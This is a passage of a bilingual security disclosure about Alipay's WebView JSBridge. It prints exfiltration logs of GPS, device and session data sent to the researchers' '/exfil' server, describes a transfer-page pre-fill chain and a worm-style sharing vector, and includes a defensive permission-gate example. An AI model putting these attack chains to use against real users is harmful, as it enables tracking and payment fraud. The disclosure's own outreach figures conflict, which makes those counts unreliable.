<tr><td>V-12</td><td><span class="zh">pushWindow 跳转登录页面 (钓鱼入口)</span><span class="en">pushWindow redirects to login page (phishing)</span></td><td><span class="severity sev-high">HIGH</span></td><td>screenshot</td></tr>
<tr><td>V-13</td><td><span class="zh">链式 WebView 攻击</span><span class="en">Chain WebView attack</span></td><td><span class="severity sev-high">HIGH</span></td><td>308 logs</td></tr>
<tr><td>V-14</td><td><span class="zh">会话信息泄露</span><span class="en">Session info leakage</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
<tr><td>V-15</td><td><span class="zh">完整设备指纹外传</span><span class="en">Full device fingerprint exfiltration</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
<tr><td>V-16</td><td><span class="zh">网络信息泄露</span><span class="en">Network info leakage</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
<tr><td>V-17</td><td><span class="zh">API 权限地图泄露</span><span class="en">API permission map leakage</span></td><td><span class="severity sev-medium">MED</span></td><td>308 logs</td></tr>
</table>
</section>
<!-- ==================== 5. EVIDENCE ==================== -->
<section id="evidence">
<h2><span class="num">05</span>
<span class="zh">证据展示</span>
<span class="en">Evidence</span>
</h2>
<h3>
<span class="zh">服务器端数据外传日志</span>
<span class="en">Server-Side Exfiltration Logs</span>
</h3>
<div class="zh">
<p>以下是攻击者服务器实际接收到的数据。这些日志记录在 <code>innora.ai</code> 上的数据收集端点,证明数据确实从支付宝 WebView 中外传到了外部服务器。</p>
</div>
<div class="en">
<p>Below is the actual data received by the attacker server. These logs were recorded at the data collection endpoint on <code>innora.ai</code>, proving that data was indeed exfiltrated from the Alipay WebView to an external server.</p>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">GPS 定位数据(马来西亚槟城)</span>
<span class="en">GPS Location Data (Penang, Malaysia)</span>
</div>
<pre><code>{
  "timestamp": "2026-03-07 11:53:51.599",
  "method": "POST",
  "path": "/exfil",
  "body": {
    "tag": "getLocation:GPS location",
    "data": {
      "status": "ok",
      "data": {
        "accuracy": 35,
        "city": "槟城",
        "country": "马来西亚",
        "latitude": "[脱敏]",
        "longitude": "[脱敏]"
      }
    }
  }
}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">设备完整指纹Redmi</span>
<span class="en">Full Device Fingerprint (Redmi)</span>
</div>
<pre><code>{
  "tag": "getSystemInfo:Device info",
  "data": {
    "apiLevel": 36,
    "app": "alipay",
    "bluetoothEnabled": true,
    "brand": "Redmi",
    "cameraAuthorized": false,
    "currentBattery": "100%",
    "locationAuthorized": true,
    "model": "Xiaomi 23129RN51X",
    "platform": "Android",
    "screenHeight": 1650,
    "screenWidth": 720,
    "storage": "119 GB",
    "system": "16",
    "version": "10.8.26.7000",
    "wifiEnabled": true
  }
}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">会话参数泄露(含 sessionId 和来源信息)</span>
<span class="en">Session Parameter Leakage (incl. sessionId and source info)</span>
</div>
<pre><code>{
  "tag": "getStartupParams",
  "data": {
    "sessionId": "session_20000067_22751",
    "startFromExternal": "true",
    "sourcePackageName": "com.android.chrome",
    "safePayEnabled": "true",
    "appId": "20000067",
    "url": "http://192.168.80.12:8888/chain1.html"
  }
}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">转账页面预填成功</span>
<span class="en">Transfer Page Pre-fill Success</span>
</div>
<pre><code>{"tag": "f_startApp:转账预填(09999988)", "data": {"status": "ok", "result": {"success": true}}}
{"tag": "f_pushWindow:transfer_scheme", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_pushWindow:cashier(支付收银台)", "data": {"status": "ok", "result": {"success": "true"}}}
{"tag": "f_tradePay:full_orderStr", "data": {"status": "ok", "result": {"resultCode": "6001"}}}</code></pre>
</div>
<div class="evidence-box">
<div class="label">
<span class="zh">User-Agent 证明数据来自支付宝 WebView</span>
<span class="en">User-Agent Proves Data Originates from Alipay WebView</span>
</div>
<pre><code>Mozilla/5.0 (Linux; Android 16; 23129RN51X Build/BP2A.250605.031.A3; wv)
AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/126.0.6478.122
NebulaSDK/1.8.100112 Nebula
AliApp(AP/10.8.26.7000) AlipayClient/10.8.26.7000
Language/zh-Hant Region/CN</code></pre>
<p>
<span class="zh">User-Agent 中包含 <code>NebulaSDK</code>、<code>AliApp(AP/10.8.26.7000)</code>、<code>AlipayClient</code> — 这是支付宝 Nebula WebView 容器的独特标识,无法伪造。证明这些请求确实来自支付宝应用内部。</span>
<span class="en">The User-Agent contains <code>NebulaSDK</code>, <code>AliApp(AP/10.8.26.7000)</code>, <code>AlipayClient</code> — unique identifiers of the Alipay Nebula WebView container that cannot be forged. This proves these requests genuinely originated from within the Alipay app.</span>
</p>
</div>
<h3>
<span class="zh">证据文件清单</span>
<span class="en">Evidence File Inventory</span>
</h3>
<table>
<tr>
<th>
<span class="zh">文件类型</span><span class="en">File Type</span>
</th>
<th>
<span class="zh">数量</span><span class="en">Count</span>
</th>
<th>
<span class="zh">描述</span><span class="en">Description</span>
</th>
</tr>
<tr>
<td>
<span class="zh">设备截图</span><span class="en">Device Screenshots</span>
</td>
<td>42</td>
<td>
<span class="zh">包含 CRITICAL 标签的 25 张 + 普通验证 17 张</span>
<span class="en">25 with CRITICAL labels + 17 general verification</span>
</td>
</tr>
<tr>
<td>
<span class="zh">服务器日志</span><span class="en">Server Logs</span>
</td>
<td>308 entries</td>
<td>
<span class="zh">exfil_server_log_20260307_complete.jsonl (136 KB)</span>
<span class="en">exfil_server_log_20260307_complete.jsonl (136 KB)</span>
</td>
</tr>
<tr>
<td><span class="zh">PoC HTML</span><span class="en">PoC HTML</span></td>
<td>8</td>
<td>
<span class="zh">chain1~chain8 攻击链 + trigger 触发页</span>
<span class="en">chain1~chain8 attack chains + trigger page</span>
</td>
</tr>
<tr>
<td>
<span class="zh">攻击服务器</span><span class="en">Attack Server</span>
</td>
<td>1</td>
<td>
<span class="zh">Python server.py (数据收集 + 日志记录)</span>
<span class="en">Python server.py (data collection + logging)</span>
</td>
</tr>
<tr>
<td>Nginx</td>
<td>1</td>
<td>
<span class="zh">nginx_exfil_access.log (52 KB)</span>
<span class="en">nginx_exfil_access.log (52 KB)</span>
</td>
</tr>
</table>
</section>
<!-- ==================== 6. DEVICES ==================== -->
<section id="devices">
<h2><span class="num">06</span>
<span class="zh">跨平台验证</span>
<span class="en">Cross-Platform Verification</span>
</h2>
<div class="zh">
<p>所有攻击链在以下 3 台真实设备上独立验证成功,覆盖 Android 和 iOS 平台:</p>
</div>
<div class="en">
<p>All attack chains were independently verified on 3 real devices across Android and iOS platforms:</p>
</div>
<div class="devices-grid">
<div class="device-card">
<div class="icon">📱</div>
<div class="name">Samsung Galaxy S25 Ultra</div>
<div class="detail">SM-S938B</div>
<div class="detail">Android 16 (API 36)</div>
<div class="detail">
<span class="zh">奥克兰, 新西兰</span>
<span class="en">Auckland, New Zealand</span>
</div>
<div class="detail">Alipay 10.8.26.7000</div>
</div>
<div class="device-card">
<div class="icon">📱</div>
<div class="name">Redmi 23129RN51X</div>
<div class="detail">Xiaomi</div>
<div class="detail">Android 16 (API 36)</div>
<div class="detail">
<span class="zh">槟城, 马来西亚</span>
<span class="en">Penang, Malaysia</span>
</div>
<div class="detail">Alipay 10.8.26.7000</div>
</div>
<div class="device-card">
<div class="icon">📱</div>
<div class="name">iPhone 16 Pro</div>
<div class="detail">iPhone (18,4)</div>
<div class="detail">iOS 26.3.1</div>
<div class="detail">
<span class="zh">杭州, 中国</span>
<span class="en">Hangzhou, China</span>
</div>
<div class="detail">Alipay 10.8.30.6000</div>
</div>
</div>
</section>
<!-- ==================== 7. iOS ==================== -->
<section id="ios">
<h2><span class="num">07</span>
<span class="zh">iOS 特有风险</span>
<span class="en">iOS-Specific Risks</span>
</h2>
<div class="zh">
<p>iPhone 设备上的 API 权限比 Android <strong>更宽松</strong>,攻击面更大:</p>
</div>
<div class="en">
<p>API permissions on iPhone are <strong>more permissive</strong> than Android, creating a larger attack surface:</p>
</div>
<table>
<tr>
<th>API</th>
<th>Android</th>
<th>iOS</th>
<th>
<span class="zh">风险</span><span class="en">Risk</span>
</th>
</tr>
<tr>
<td><code>tradePay</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">触发支付 SDK</span><span class="en">Triggers payment SDK</span>
</td>
</tr>
<tr>
<td><code>share</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh"><strong>蠕虫传播向量</strong> — 自动分享恶意链接到微信/QQ</span>
<span class="en"><strong>Worm propagation vector</strong> — auto-share malicious links to WeChat/QQ</span>
</td>
</tr>
<tr>
<td><code>scan</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">打开摄像头</span><span class="en">Opens camera</span>
</td>
</tr>
<tr>
<td><code>chooseImage</code></td>
<td style="color:#44cc88">
<span class="zh">不可用</span><span class="en">N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">访问相册</span><span class="en">Access photo library</span>
</td>
</tr>
<tr>
<td><code>getLocation</code></td>
<td style="color:#44cc88">
<span class="zh">checkJSAPI 不可用</span><span class="en">checkJSAPI N/A</span>
</td>
<td style="color:#ff4444">
<span class="zh">可用</span><span class="en">Available</span>
</td>
<td>
<span class="zh">定位窃取</span><span class="en">Location theft</span>
</td>
</tr>
</table>
<div class="callout">
<p>
<span class="zh"><strong>蠕虫风险</strong>:iOS 上的 <code>share</code> API 意味着攻击者页面可以自动将恶意链接分享到微信、QQ、短信、钉钉等平台,实现自我传播。一个受害者点击链接 → 恶意链接自动分享给其联系人 → 指数级传播。</span>
<span class="en"><strong>Worm Risk</strong>: The <code>share</code> API on iOS means the attacker page can automatically share the malicious link to WeChat, QQ, SMS, DingTalk, etc. One victim clicks → malicious link auto-shared to contacts → exponential propagation.</span>
</p>
</div>
</section>
<!-- ==================== 8. WORKING DEFENSES ==================== -->
<section id="defense">
<h2><span class="num">08</span>
<span class="zh">已生效的防护</span>
<span class="en">Working Defenses</span>
</h2>
<div class="zh">
<p>客观地说,支付宝的安全架构确实有部分防护措施正在生效。以下 API 在外部域名下被正确拦截(返回 <code>permission denied</code>):</p>
</div>
<div class="en">
<p>To be objective, Alipay's security architecture does have some working defensive measures. The following APIs are correctly blocked from external domains (returning <code>permission denied</code>):</p>
</div>
<ul>
<li><code>clipboard</code> <span class="zh">读写</span><span class="en">read/write</span></li>
<li><code>getUserInfo</code></li>
<li><code>rpc</code> (<span class="zh">后端 RPC 调用</span><span class="en">backend RPC calls</span>)</li>
<li><code>httpRequest</code> (bridge-level)</li>
<li><code>openInBrowser</code></li>
<li><code>sendSMS</code> (<span class="zh">实际发送被拦截</span><span class="en">actual sending blocked</span>)</li>
<li><code>makePhoneCall</code></li>
</ul>
<div class="zh">
<p>这说明支付宝<strong>有能力</strong>在 JSBridge 层面实施域名白名单和权限控制。上述 17 个问题中涉及的 API 只是<strong>还没有被加入到同样的权限控制机制中</strong>。</p>
</div>
<div class="en">
<p>This demonstrates that Alipay <strong>has the capability</strong> to implement domain whitelisting and permission controls at the JSBridge level. The APIs involved in the 17 issues above simply <strong>haven't been added to the same permission control mechanism yet</strong>.</p>
</div>
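<p>Added example, not Alipay's code: a single permission gate in front of <code>AlipayJSBridge.call</code> that applies the origin check the research observed for <code>clipboard</code> and <code>getUserInfo</code> to every privileged API, and that produces the capability list a "Continue to visit" dialog could show the user. The trusted-origin list, the capability wording and the function names are assumptions.</p>

```javascript
// Added example, not Alipay's code: one permission gate for every bridge
// call, so the APIs the page found reachable from external domains get the
// same "permission denied" treatment as the ones already blocked.
// Trusted origins, capability labels and function names are assumptions.

// Observed on the page: blocked vs reachable from an external domain.
const BLOCKED_TODAY = ["clipboard", "getUserInfo", "rpc", "httpRequest",
  "openInBrowser", "sendSMS", "makePhoneCall"];
const REACHABLE_TODAY = ["startApp", "pushWindow", "tradePay", "getLocation",
  "getSystemInfo", "getStartupParams", "getAuthCode", "toast", "setTitle",
  "share", "scan", "chooseImage"];

// Every privileged API carries a user-facing capability label. The label
// drives the decision (no label = harmless UI call) and the disclosure text.
const API_CAPABILITY = {
  clipboard: "read and write the clipboard",
  getUserInfo: "read your account profile",
  rpc: "call backend RPC endpoints in your name",
  httpRequest: "send network requests as the app",
  openInBrowser: "open pages in an external browser",
  sendSMS: "send SMS messages",
  makePhoneCall: "place phone calls",
  startApp: "open internal pages (e.g. Transfer) with fields pre-filled",
  pushWindow: "open alipays:// deep links and cashier pages",
  tradePay: "bring up the payment UI",
  getLocation: "read your precise GPS location",
  getSystemInfo: "read your device fingerprint",
  getStartupParams: "read session parameters",
  getAuthCode: "start an OAuth authorization in your name",
  toast: "show notifications styled like Alipay's own",
  setTitle: "change the title bar text",
  share: "share links to your contacts",
  scan: "open the camera",
  chooseImage: "read your photo library",
};

// Origins whose pages may use privileged APIs (constructed allowlist).
const TRUSTED_ORIGINS = new Set(["https://example.alipay.com"]);

// The single decision every bridge call goes through.
function decide(api, origin) {
  if (TRUSTED_ORIGINS.has(origin)) return { allow: true, reason: "trusted origin" };
  if (!(api in API_CAPABILITY)) return { allow: true, reason: "unprivileged api" };
  return { allow: false, reason: "permission denied" };
}

// Text for the interstitial shown before loading `origin`: what the page
// will be able to do. Empty for untrusted origins under this policy, so
// the dialog can state that the page receives no special access.
function grantedCapabilities(origin) {
  return Object.keys(API_CAPABILITY)
    .filter((api) => decide(api, origin).allow)
    .map((api) => API_CAPABILITY[api]);
}

// APIs this gate blocks that the research found reachable today.
function closedGaps() {
  return REACHABLE_TODAY.filter((api) => !decide(api, "https://attacker.example").allow);
}

// Wrap a bridge object so the decision is enforced for every call,
// mirroring the {status, result} / error callback shape seen in the logs.
function gateBridge(bridge, origin) {
  return {
    call(api, params, callback) {
      const d = decide(api, origin);
      if (!d.allow) {
        const err = { error: "permission denied", api };
        if (callback) callback(err);
        return err;
      }
      return bridge.call(api, params, callback);
    },
  };
}

// Constructed stand-in for the real bridge so the example runs offline;
// it only records which APIs actually reached it.
function makeFakeBridge() {
  return {
    calls: [],
    call(api, params, callback) {
      this.calls.push(api);
      const result = { status: "ok", api };
      if (callback) callback(result);
      return result;
    },
  };
}
```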
</section>
<!-- ==================== 9. VENDOR RESPONSE ==================== -->
<section id="vendor">
<h2><span class="num">09</span>
<span class="zh">厂商回应与讨论</span>
<span class="en">Vendor Response & Discussion</span>
</h2>
<div class="callout vendor">
<p>
<span class="zh"><strong>蚂蚁集团的回应（2026-03-10）</strong>:所报告的内容是"支付宝的正常功能",不认为是安全漏洞。</span>
<span class="en"><strong>Ant Group's Response (2026-03-10)</strong>: The reported issues are "normal functionality of Alipay," not considered security vulnerabilities.</span>
</p>
</div>
<div class="zh">
<h3>我们的回应</h3>
<p>我们充分尊重厂商的判断。但以下事实不会因为判定结论而改变:</p>
<ol>
<li><strong>数据确实外传了。</strong> 308 条服务器日志不是模拟的。GPS 坐标(指向槟城市区)确实从支付宝 WebView 发送到了我们的服务器。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>转账页面确实被外部触发了。</strong> <code>startApp</code> 返回 <code>success: true</code>,转账页面确实打开了,攻击者的账号确实被预填了。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>用户没有被充分告知。</strong> "继续访问"警告中<strong>没有</strong>告诉用户"该网站将获得调用支付宝内部 API 的能力,包括读取您的 GPS 位置、打开转账页面等"。用户不知道点击"继续访问"意味着什么。</li>
<li><strong>防护机制的不一致性。</strong> 既然 <code>clipboard</code> 和 <code>getUserInfo</code> 被正确拦截了,那 <code>getLocation</code> 和 <code>startApp</code> 为什么不需要同样的保护?同一个安全框架对不同 API 的处理方式不一致,这至少说明有改进空间。</li>
<li><strong>测试账户被封锁。</strong> 如果这些都是"正常功能",那为什么我们的测试账户在使用这些"正常功能"时触发了风控?这本身就说明系统认为这些行为是异常的。</li>
<li><strong>公开讨论的权利。</strong> 既然官方确认这些不是安全漏洞而是"正常功能",那我们讨论支付宝"正常功能"的安全影响,应该没有任何问题。</li>
</ol>
<p>我们发表这篇技术分析,不是为了争论"是不是漏洞"。<strong>我们只是在公开描述一个事实:攻击者可以通过一个链接,在不需要用户理解其后果的情况下,从支付宝中获取 GPS 定位、打开转账页面、显示假通知。</strong>读者可以自行判断这是否是一个值得关注的安全问题。</p>
<div class="callout info" style="margin-top: 20px;">
<p><strong>重要澄清</strong>:本文所有描述的攻击链均<strong>无法</strong>实现"零交互自动转账/扣款"。转账操作最终仍需用户主动点击确认按钮。我们讨论的核心风险是:在 UI 欺骗 + 社会工程 + 预填信息的组合攻击下,用户做出错误操作的概率被大幅提高。我们严格区分"页面成功跳转"和"资金操作完成",不做任何夸大。</p>
</div>
</div>
<div class="en">
<h3>Our Response</h3>
<p>We fully respect the vendor's judgment. However, the following facts do not change based on the classification decision:</p>
<ol>
<li><strong>Data was indeed exfiltrated.</strong> The 308 server log entries are not simulated. GPS coordinates (pointing to Penang urban area) were indeed transmitted from Alipay WebView to our server. This fact is independent of whether it's classified as a "vulnerability."</li>
<li><strong>The transfer page was indeed triggered externally.</strong> <code>startApp</code> returned <code>success: true</code>, the transfer page opened, and the attacker's account was pre-filled. This fact is independent of the classification.</li>
<li><strong>Users are not adequately informed.</strong> The "Continue to visit" warning does <strong>not</strong> tell users: "This website will gain the ability to call Alipay internal APIs, including reading your GPS location, opening transfer pages, etc." Users don't know what clicking "Continue" means.</li>
<li><strong>Defense mechanism inconsistency.</strong> If <code>clipboard</code> and <code>getUserInfo</code> are correctly blocked, why don't <code>getLocation</code> and <code>startApp</code> receive the same protection? The inconsistent treatment of different APIs within the same security framework at minimum indicates room for improvement.</li>
<li><strong>Test account was banned.</strong> If these are all "normal features," why did our test account trigger risk controls when using these "normal features"? This itself indicates the system considers these behaviors abnormal.</li>
<li><strong>Right to public discussion.</strong> Since the vendor officially confirmed these are not security vulnerabilities but "normal features," discussing the security implications of Alipay's "normal features" should be entirely appropriate.</li>
</ol>
<p>We publish this technical analysis not to argue about whether something is a "vulnerability." <strong>We are simply publicly describing a fact: an attacker can, through a single link, obtain GPS location from Alipay, open transfer pages, and display fake notifications — without the user understanding the consequences.</strong> Readers can judge for themselves whether this is a security concern worth attention.</p>
<div class="callout info" style="margin-top: 20px;">
<p><strong>Important Clarification</strong>: None of the attack chains described in this article can achieve "zero-interaction automatic transfers/debits." Fund transfers still require the user to actively tap the confirmation button. The core risk we discuss is: under the combined attack of UI spoofing + social engineering + pre-filled information, the probability of users making erroneous operations is significantly increased. We strictly distinguish between "page navigation succeeded" and "fund operation completed," and make no exaggerations.</p>
</div>
</div>
</section>
<!-- ==================== 9.5 GLOBAL REGULATORY RESPONSE ==================== -->
<section id="global-response">
<h2><span class="num">9.5</span>
<span class="zh">Global Regulatory Response</span>
<span class="en">Global Regulatory Response</span>
</h2>
<div class="callout" style="border-color: var(--green); background: rgba(68,204,136,.06);">
<p>
<span class="zh"><strong>As of 2026-03-17</strong>: we have sent 649 security notification emails to 300+ regulators, CERTs, privacy authorities, media outlets and security communities across 40+ countries/regions. <strong>41 institutions/platforms have formally responded</strong>. Below is a summary of the institutions from which a clear intake result has been received.</span>
<span class="en"><strong>As of 2026-03-17</strong>: We have sent 649 security notification emails to 300+ regulatory bodies, CERTs, privacy authorities, media outlets, and security communities across 40+ countries/regions. <strong>41 institutions/platforms have formally responded</strong>. Below is a summary.</span>
</p>
</div>
<div class="zh">
<h3 style="color: var(--accent); margin-top: 24px;">I. Formal Investigations / Case Filed (7)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Status</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Key Information</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA (Hong Kong Monetary Authority)</strong></td>
<td style="padding:8px 12px;">🇭🇰 Hong Kong</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Formal Complaint Filed</strong></td>
<td style="padding:8px 12px;">Accepted by a Senior Officer of the Retail Payment Oversight Division; SVF (stored value facility) licensee formal complaint form submitted; 7-day acknowledgement window</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC (Singapore Personal Data Protection Commission)</strong></td>
<td style="padding:8px 12px;">🇸🇬 Singapore</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Under Investigation</strong></td>
<td style="padding:8px 12px;">Formal investigation case opened by the privacy commission</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Forwarded to Investigation Team</strong></td>
<td style="padding:8px 12px;">Human response from Apple Product Security confirming the report was forwarded to a dedicated investigation team, which is investigating the high-risk APIs exposed by the JSBridge on Alipay iOS</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Policy Violation Investigation</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action"</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>36 CVEs Pending Assignment (11 tickets)</strong></td>
<td style="padding:8px 12px;">36 CVE requests submitted via the CNA-LR pathway across 11 MITRE tickets, all confirmed received</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF (Luxembourg financial regulator)</strong></td>
<td style="padding:8px 12px;">🇱🇺 Luxembourg</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing Case + ICT Risk Confirmed</strong></td>
<td style="padding:8px 12px;">4 departments/channels confirmed receipt (Whistleblowing team case filed + ICT Risk Supervision human confirmation ×2 + Reclamation confirmation); the ICT Risk Supervision department explicitly stated it "takes note of the report's contents"; supplementary evidence submitted linking to the 2025 anti-money-laundering penalty record</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--green);"><strong>Published</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a> — "Alipay Open Redirect / API Attacker Payload Insertion"</td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">II. Acknowledged and Forwarded / In Progress (11)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Response</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL (Luxembourg CERT)</strong></td><td style="padding:8px 12px;">🇱🇺 Luxembourg</td><td style="padding:8px 12px;">Incident handling analyst responded personally; <strong>contacted the Alibaba Security Response Center on our behalf</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR (France)</strong></td><td style="padding:8px 12px;">🇫🇷 France</td><td style="padding:8px 12px;">"Forwarded to the relevant department; will reply as soon as possible"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT (Hong Kong)</strong></td><td style="padding:8px 12px;">🇭🇰 Hong Kong</td><td style="padding:8px 12px;"><strong>Formally forwarded to CNCERT</strong> (China's national computer network emergency response centre)</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA (New Zealand financial regulator)</strong></td><td style="padding:8px 12px;">🇳🇿 New Zealand</td><td style="padding:8px 12px;">"Information has been recorded; considering whether to take further action against Alipay"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA (UK Financial Conduct Authority)</strong></td><td style="padding:8px 12px;">🇬🇧 United Kingdom</td><td style="padding:8px 12px;">Whistleblowing team confirmed receipt; under review (concerning AIUK Services Limited, formerly Alipay UK Ltd)</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB (Dutch central bank)</strong></td><td style="padding:8px 12px;">🇳🇱 Netherlands</td><td style="padding:8px 12px;">Cyber Defense Center confirmed receipt; directed to the supervisory channel</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK (Indonesian financial regulator)</strong></td><td style="padding:8px 12px;">🇮🇩 Indonesia</td><td style="padding:8px 12px;">Requested further details; full technical report provided in reply</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC (Australian Information Commissioner)</strong></td><td style="padding:8px 12px;">🇦🇺 Australia</td><td style="padding:8px 12px;">Intake team confirmed receipt of the complaint</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB (European Data Protection Board)</strong></td><td style="padding:8px 12px;">🇪🇺 EU</td><td style="padding:8px 12px;">Confirmed receipt of the cross-border data protection complaint</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT (Thailand)</strong></td><td style="padding:8px 12px;">🇹🇭 Thailand</td><td style="padding:8px 12px;">"Forwarded to the responsible person"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM (Bank Negara Malaysia)</strong></td><td style="padding:8px 12px;">🇲🇾 Malaysia</td><td style="padding:8px 12px;">Ticket confirmed received</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">III. Auto-Acknowledgements / Template Replies (8)</h3>
<p>BSP (Philippines central bank), OSFI (Canada financial regulator), Privacy International, ProPublica, CNA/Mediacorp (Singapore), Datatilsynet (Denmark data protection), DSB (Austria data protection), IMY (Sweden data protection).</p>
<h3 style="margin-top: 24px;">Overview</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>Total sent: <strong>~189 emails</strong>, covering <strong>22 countries/regions</strong>, about 160 targets</li>
<li>Delivery rate: <strong>~90%</strong> (bounces corrected and re-sent over 4 rounds)</li>
<li>Responses received: <strong>39+</strong> (response rate ~23%)</li>
<li><strong>7 formal investigations/cases</strong>: HKMA, PDPC, Apple, Google, MITRE, CSSF, Packet Storm</li>
<li><strong>CIRCL (Luxembourg national CERT)</strong> proactively contacted the Alibaba Security Response Center on our behalf</li>
<li><strong>HKCERT → CNCERT</strong>: the only regulatory pathway that directly reaches mainland China entities has been activated</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>Note: to protect ongoing investigation procedures, some case numbers and contact emails have been redacted. This table will be updated as investigations progress.</em></p>
</div>
<div class="en">
<h3 style="color: var(--accent); margin-top: 24px;">I. Formal Investigations / Case Filed (7)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Status</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Key Information</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA (Hong Kong Monetary Authority)</strong></td>
<td style="padding:8px 12px;">🇭🇰 Hong Kong</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Formal Complaint Filed</strong></td>
